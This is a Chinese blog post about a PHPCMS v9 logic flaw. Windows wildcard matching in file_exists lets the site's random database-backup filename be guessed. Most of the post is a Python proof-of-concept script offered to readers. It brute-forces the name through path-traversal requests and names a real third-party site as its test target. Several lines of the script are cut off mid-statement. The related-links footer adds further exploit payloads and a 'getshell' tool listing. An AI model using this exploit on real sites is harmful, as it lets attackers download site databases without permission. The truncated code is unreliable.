php逻辑漏洞,PHPCMSv9逻辑漏洞导致备份文件名可猜测

最新推荐文章于 2022-12-01 14:51:10 发布
最新推荐文章于 2022-12-01 14:51:10 发布
阅读量306 收藏 1
点赞数
文章标签: php逻辑漏洞

简要描述

一处逻辑漏洞导致备份文件名可猜测,影响phpcmsv9所有版本。

一、漏洞原理

我们知道windows的FindFirstFile(API)有个特性就是可以把<

二、漏洞形成

程序文件apicreatimg.php里的$fontfile变量可控随后便进入file_exists函数判断。当文件存在和不存在时所返回的页面是不一样的。所以完全可以利用这个点来把长达30多位随机字母名称的备份文件推算出来(备份文件在web目录)。

26e94bc36e51e14d0558e819f463c9d9.png

三、你们想要的漏洞POC

#!/usr/bin/env python

#coding=utf-8

import urllib2

def check(url):

mark = True

req = urllib2.Request(url)

req.add_header('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')

response = urllib2.urlopen(req)

content = response.read()

if 'Cannot' in content:

mark = False

return mark

def guest(target):

arr = []

num = map(chr, range(48, 58))

alpha = map(chr, range(97, 123))

exploit = '%s/api.php?

op=creatimg&txt=dysec&font=/../../../../caches/bakup/default/%s%s<<.sql>

while True:

for char in num:

if check(exploit % (target, ''.join(arr), char)):

arr.append(char)

continue

if len(arr) 

for char in alpha:

if check(exploit % (target, ''.join(arr), char)):

arr.append(char)

continue

elif len(arr) == 20:

arr.append('_db_')

elif len(arr)== 29:

arr.append('_1.sql')

break

if len(arr) 

print '[*]not find!'

return

print '[*]find: %s/caches/bakup/default/%s' % (target, ''.join(arr))

if __name__ == "__main__":

url = '//security.douyu.com'

#test

guest(url)

四、POC运行效果

a3b8462535431b64da81f511138f3cbc.png

ffd45e4c1c2fff9782a8e2e3e3a04789.png

本文最后更新于2018-9-15,已超过 1 年没有更新,如果文章内容或图片资源失效,请留言反馈,我们会及时处理,谢谢!

宜家宜室
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpcmsv9.0任意文件上传漏洞解析
01-19
POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Fire...
DAY25:逻辑漏洞复现
qq_49433473的博客
08-08 1047
phpaacms垂直漏洞复现 Catfishcms水平越权漏洞复现 大米cms--0元支付逻辑漏洞 Bugscan--支付竞争漏洞
4-PHP代码审计——PHPCMSV9.6.1暴力猜解备份数据库文件
网络安全
04-01 521
实验环境的poc /api.php?op=creatimg&txt=1&font=/../../../../caches/bakup/default/z<<.sql 登录phpcms的管理员后台,在扩展模块找到数据库工具,选中数据库文件开始备份数据库 点击备份数据库后,会在C:\wamp\www\test.com\caches\bakup\default目录下生成sql备份文件: 直接在浏览器中访问路径可以下载sql文件: 现在我...
phpcms数据库备份与恢复_phpcms V9 sql备份文件名爆破
weixin_39729837的博客
12-23 566
payload:/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/gv5dmx<我们知道windows的FindFirstFile(API)有个特性就是可以把<这个漏洞和前一阵子dedecms后台爆破如出一辙,api.php文件的$op变量决定用户的操作# api.phpdef...
phpcms漏洞姿势
2ed
05-09 656
作者:J0o1ey 原文来自:论如何优雅地拿下PHPCMS 一、PHPCMS简介 PHP是国内领先的网站内容管理系统,同时也是一个开源的PHP开发框架,采用PHP5+MYSQL进行开发,拥有非常庞大的用户量。 百度百科介绍其优点主要如下: ①功能强大 ②模块化,开源,可扩展功能强大灵活 ③支持自定义模型和字段负载能力强,支持千万级数据模板制作方便 ④支持中文标签和万能标签进行数...
phpcms v9文件上传漏洞复现
qq_50646296的博客
08-21 1775
我们通过软件burp suite 抓包,修改一个变量,不停的发包,我们可以手动或者让软件不停的访问我们呢上传的PHP,如果显示出PHP内容,时间竞争成功。方法:我们发现它只是删除了压缩包里面的文件,但这段代码并不会对解压后的文件夹递归删除,只能对解压的文件直接删除。分析:当程序不递归删除时,我们直接将图片和.php文件压缩上传,会发现图片还在,.php文件被删除了。此时,我们再将其上传,可以看到,我们的PHP文件就被保留下来了。我们创建一个文件夹,放入以下文件,然后将这个文件经行压缩。
phpcmsV9后台模板
06-14
就下我就对了,我浪费了50积分下载“phpcmsV9后台模板”,都是我这样的。 说的不清楚的不要下,要积分高的不要下。 说“由于官方后台不好看,而且对客户来说使用过程中容易起各种纠纷,该后台模板全新黑色后台,去除...
PHPCMSV9后台模板MunSkinv1.2by蒙奇时光
05-19
phpcms v9的后台模板,非常的靓丽,本地实际测试和服务器上面测试并且没有错误。
phpcmsV9.6.3升级补丁漏洞修复代码功能二次开发补丁phpcms网站开发教程文档手册
03-18
本压缩包包括多年积累的phpcms网站开发升级补丁,漏洞修复补丁。 其中包括教程文档: 后台安装过程中报错 弹出新窗口而不是新选项卡 浏览器不支持缩略图flash上传改H5 表单发送的邮件不显示表单内容 升级后台编辑器-...
phpcmsv9商品模块+订单最新V9商城插件.zip
05-27
phpcmsv9商品模块+订单最新V9商城插件
利用phpcms v9 0day拿shell+提权.wps
12-31
此Oday非同寻常,速度下载吧黑友们!一天几个站没问题!
PHPCMS V9专题模块注入漏洞的分析与修复方法
09-29
本文来分析一下PHPCMS V9专题模块注入漏洞
phpcmsv9最新利用工具
04-01
phpcmsv9最新利用工具
phpcms v9安全检测api漏洞修改方法
09-29
为什么360总是提示Phpcms v9api漏洞?今天在这里与大家探讨Phpcms V9安全检测api漏洞修改方法
研究人员在宜家智能照明系统发现漏洞,攻击者可以利用这些漏洞导致灯泡闪烁恢复出厂设置
m0_70655343的博客
11-09 1444
CVE-2022-39064的CVSS评分为7.1,其核心是Zigbee协议,一种用于无线电、医疗设备和家庭自动化工具等低功率、低数据率设备的无线网络类型。“V-2.3.091版本修复了一些畸形帧的问题,但不是所有已知的畸形帧,”他们说,并分享了该漏洞的一个视频。宜家的一位发言人向媒体表示,自披露以来,该公司已与Synopsys合作,以改善其智能设备的安全和功能。该发言人表示,由于Zigbee协议的设计,所发现的问题并没有危及客户安全,攻击者不能获得TRÅDFRI网关或智能设备内的敏感信息。
PHPCMS v9本地文件包含漏洞Getshell
fansenliangren的博客
12-01 1426
文件包含是指程序代码在处理包含文件的时候没有严格控制。导致用户可以构造参数包含远程代码在服务器上执行,并得到网站配置或者敏感文件,进而获取到服务器权限,造成网站被恶意删除,用户和交易数据被篡改等一系列恶性后果......
phpcms v9.任意文件上传漏洞复现
newlife1441的博客
08-15 4481
如果你也出现上面的情况请试试下面说的方法:这里有一个小坑注意,你在压缩前面的文件时要注意他们在压缩文件中的顺序,意思就是你创建的一个php文件在创建的txt文件的上面就可以成功,只有这样在解压失败后它还是能够保留并将php文件成功解压出来。时间竞争漏洞利用原理其实就是在解压文件后与删除限制的文件之间的时间空隙来利用提前在限制的文件中写好的利用代码在非解压目录下生成新的不会被删除的新文件(木马),通过这个木马来拿下网站。原理:这里我们通过利用解压文件在解压过程出错会导致后面的递归删除操作不会执行的特点。...
phpcmsV9官方源码漏洞
haocaicai的博客
09-27 1223
(1)、phpcms的/phpcms/libs/classes/attachment.class.php中,对输入参数$ext未进行类型限制,导致逻辑漏洞的产生。 解决方法:修改/phpcms/libs/classes/attachment.class.php文件143行左右的download方法,在方法开始位置加入: function download($field, $value,$...
PHP代码审计6—文件包含漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
07-27 1787
文件包含漏洞整理与历史漏洞分析
phpcmsv9 升级到php7
最新发布
06-11
1. 备份 PHPCMS v9 的数据库和文件。 2. 下载 PHP7,并安装。 3. 修改服务器的 PHP 配置文件 php.ini,开启必要的扩展和选项,例如开启 mysqli 扩展,修改默认时区等。 4. 将 PHPCMS v9 的源代码中的 PHP 代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值